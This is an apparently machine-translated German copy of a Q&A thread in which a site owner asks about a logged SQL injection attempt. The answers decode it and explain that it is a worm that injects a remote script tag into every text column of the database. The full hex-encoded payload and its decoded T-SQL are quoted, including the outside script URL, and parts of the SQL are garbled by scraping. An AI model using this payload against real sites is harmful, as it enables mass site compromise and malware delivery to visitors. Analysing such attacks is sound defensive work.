2008-10-14 10 views
21

Ich habe eine öffentlich zugängliche Website, die in den letzten Wochen eine Reihe von SQL-Injection-Angriffen erhalten hat. I ausschließlich gespeicherte Prozeduren parametrisiert verwenden, damit ich glaube, dass es keine erfolgreich Angriffe gewesen ist, aber ein aktuelles Protokoll eine interessante Technik zeigte:Versuchte SQL-Injection-Attacke - was versuchen sie zu tun?

Zeilenumbrüche für Klarheit hinzugefügt

 
http://www.mydummysite.uk/mypage.asp?l_surname=Z;DECLARE%[email protected]%20CHAR(4000);SET 
@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263 
686172283430303029204445434C415245205461626C655F437572736F7220435552534F 
5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F 
626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E69 
6420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F72 
20622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970 
653D31363729204F50454E205461626C655F437572736F72204645544348204E45585420 
46524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528 
404046455443485F5354415455533D302920424547494E20657865632827757064617465 
205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C 
736372697074207372633D22687474703A2F2F777777322E73383030716E2E636E2F6373 
7273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D2077 
6865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C73 
6372697074207372633D22687474703A2F2F777777322E73383030716E2E636E2F637372 
73732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E455854 
2046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E442043 
4C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F43 
7572736F72 AS CHAR(4000));EXEC(@S);&_X=" 

Kann jemand Aufschluss Was versucht die "CAST und EXEC" zu tun?

Antwort

30

Unten ist die dekodiert SQL, die sie zu drücken versuchten:

DECLARE @T varchar(255), 
     @C varchar(4000) 

DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name 
FROM sysobjects a,syscolumns b 
WHERE a.id=b.id 
AND a.xtype='u' 
AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) 

OPEN Table_Cursor FETCH NEXT 
FROM Table_Cursor INTO @T,@C 
WHILE(@@FETCH_STATUS=0) 
    BEGIN exec('update ['[email protected]+'] SET ['[email protected]+']=''"></title><script src="http://www2.s800qn.cn/csrss/w.js"></script><!--''+['[email protected]+'] WHERE '[email protected]+' NOT like ''%"></title><script src="http://www2.s800qn.cn/csrss/w.js"></script><!--''') 
    FETCH NEXT FROM Table_Cursor INTO @T,@C 
END CLOSE Table_Cursor 

DEALLOCATE Table_Cursor 
+1

Wie hast du das en-encode? – Guy

+0

Googeln "Hex zu String" gab mir das: http://www.string-functions.com/hex-string.aspx. Danach war es eine einfache Angelegenheit des SQL-Pretty-Printing. – Ishmaeel

+0

* Smacks Kopf * Vielen Dank für so eine schnelle Antwort. – Guy

11

Der Code, wenn sie von Hex in Zeichen entziffert, scheint durch alle Ihre Datenbank-Tabellen zu gehen, alle Spalten auswählen, die von Text sind/char type, und fügen Sie am Ende jedes Werts dieses Typs eine bösartige Skriptausführung von http://www2.s800qn.cn/csrss/w.js hinzu. Wenn Sie nun auf Ihrer Website mindestens einen Platz haben, an dem Sie keine Textdaten aus Ihrer Datenbank abrufen können, wird das schädliche Skript auf den Computern Ihrer Website ausgeführt.

4

Ich denke, wir hatten diesen Angriff schon einmal. Es versucht, ein <script>-Tag in jedes Feld in jeder Tabelle in der Datenbank einzufügen.

1

Der einfachste Python-Algorithmus den Hex-Code zu entziffern, ist dies:

text = "4445434C415245204054207661726368617228323535292C404..." 

def getText(): 
    for i in range(0, len(text), 2): 
     byte = text[i:i+2] 
     char = int(byte, 16) 
     toPrint = chr(char) 
     yield toPrint 

print ''.join(getText()) 
7

Run dies zum Beispiel in mysql:

select CAST(0x44...72 AS CHAR(4000)) as a; 

und Sie wissen. Ishmaeel hat den Code eingefügt.

Dies ist ein SQLserver Wurm, kein gezieltes Atatck.

3

Es ist ein Adware-Dropper-Skript, gebaut, um Ihre Datenbank mit <script> Tags zu verstopfen, die auf Ihren Seiten angezeigt werden. Es ist verschlüsselt, weil die meisten Server explodieren würden, wenn Sie versuchen, diesen Junk über die URL zu pushen.

Die meisten Dinge wie das sind zufällige Attacken, da sie alles mit einer Querystring treffen, aber es könnte ein gezielter Angriff sein. Testen Sie Ihre Site, um sicherzustellen, dass keine SQL-Abfragen von Querystrings ausgeführt werden. Nur mit parametrisierten Abfragen sollte Sie abdecken.

+0

Ja, ich kodiere auch meine QUERYSTRING's und FORM-Felder, entferne spitze Klammern etc etc und die anderen üblichen Datenhygene Zeug! – Guy